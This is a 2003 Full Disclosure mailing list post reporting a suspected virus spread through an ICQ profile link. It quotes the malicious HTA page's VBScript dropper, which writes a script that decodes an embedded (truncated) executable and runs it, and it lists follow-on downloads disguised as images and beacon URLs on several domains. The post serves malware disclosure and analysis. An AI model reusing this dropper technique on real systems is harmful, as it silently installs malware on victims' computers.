Full Disclosure mailing list archives
New Virus?
From: "Michael Bemmerl" <security () astrobox net>
Date: Sat, 6 Dec 2003 00:04:23 +0100
Hi everybody! Today I got an ICQ-Message from an user called "Monica" (Just search on ICQ: http://people.icq.com/whitepages/search_results/1,,,00.html?FirstName=Moniqu e&LastName=&NickName=Monica&Country=49). In her details is an URL: http://www.rsngermany.com/my_foto.htm This is a fake 404-Error-Page, because in the <head>-tags is a link to http://www.rsngermany.com/dn2.hta : [HTML] [HEAD] [TITLE]Windows Update[/TITLE] [HTA:APPLICATION ID="Q" APPLICATIONNAME="Q" BORDER="none" BORDERSTYLE="normal" CAPTION="no" ICON="" CONTEXTMENU="no" MAXIMIZEBUTTON="no" MINIMIZEBUTTON="no" SHOWINTASKBAR="no" SINGLEINSTANCE="no" SYSMENU="no" VERSION="1.0" WINDOWSTATE="minimize"/] [SCRIPT LANGUAGE="VBScript"] MyFile = "q.vbs" Set FSO = CreateObject("Scripting.FileSystemObject") Set TSO = FSO.CreateTextFile(MyFile, True) TSO.write "WScript.Sleep(50000)" & vbcrlf TSO.write "szBinary = szBinary & ""4D5A...snip...0000000"" & szZeroLine" & vbcrlf TSO.write "szApplication = ""x.exe""" & vbcrlf TSO.write "Set hFSO = CreateObject(""Scripting.FileSystemObject"")" & vbcrlf TSO.write "Set hFile = hFSO.CreateTextFile(szApplication, ForWriting)" & vbcrlf TSO.write "intLength = len(szBinary)" & vbcrlf TSO.write "intPosition = 1" & vbcrlf TSO.write "while intPosition [ intLength" & vbcrlf TSO.write "char = Int(""&H"" & Mid(szBinary, intPosition, 2))" & vbcrlf TSO.write "hFile.Write(Chr(char))" & vbcrlf TSO.write "intPosition = intPosition+2" & vbcrlf TSO.write "wend" & vbcrlf TSO.write "hFile.Close" & vbcrlf TSO.write "Set hShell=CreateObject(""WScript.Shell"")" & vbcrlf TSO.write "hShell.run(szApplication+"" ""+szURL)" & vbcrlf TSO.close Set TSO = Nothing Set FSO = Nothing # Dim WshShell # Set WshShell = CreateObject("WScript.Shell") # WshShell.Run "q.vbs", 0, false [/SCRIPT] [script]window.close()[/script] [/HEAD] [/html] The .hta creates a file named q.vbs. That creates and runs x.exe. Notice the unset parameter szURL in q.vbs (I asume that you can specify where to download the next files - empty could mean that the files are loaded from the coded location: http://rsngermany.com). The x.exe is FSG-packed; you can upack it with Un-FSG! (just google for it). The file will download another exe-File, tarned as jpg: http://www.rsngermany.com/3.jpg I tested this exe with wine, it creates two files in the windows-dir.: msreg.exe and fghy.exe (again packed with FSG) and two in system32: svchostc.exe and svchosts.exe. Maybe it creates some run-entries in the registry, but i couldn't test this. And it sends request to various domains: All requests end in 404-Errors, except two (see end of list) (replace * with d and f) comdat.de/kreta/yif.php www.dataforcecg.com/webvision/yi*.php www.eurostretch.ru/yi*.php www.hhc-online.de/home/links/pics/yi*.php www.courie.ru/style/yi*.php mucuc.h10.ru/forum/yi*.php www.gran-pri.ru/yi*.php www.mir-auto.ru/yi*.php artesproduction.com/yif.php comdat.de/kreta/yid.php --> 301, redirection to comcat.de/kreta/zid.php comdat.de/kreta/zid.php --> 200, just prints out your ip. Maybe the author logs infected PC's artesproduction.com/yid.php --> 200, again prints out the ip The svchosts.exe has some HTTP-response-message for Error 400, 502 and 503 I tested the files with NAV2003, latest def., no infection. Some ideas what it could be? Greetings, Michael _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- New Virus? Michael Bemmerl (Dec 05)
- Re: New Virus? Nick FitzGerald (Dec 05)
- Re: Re: New Virus? Michael Bemmerl (Dec 10)
- Re: New Virus? Nick FitzGerald (Dec 05)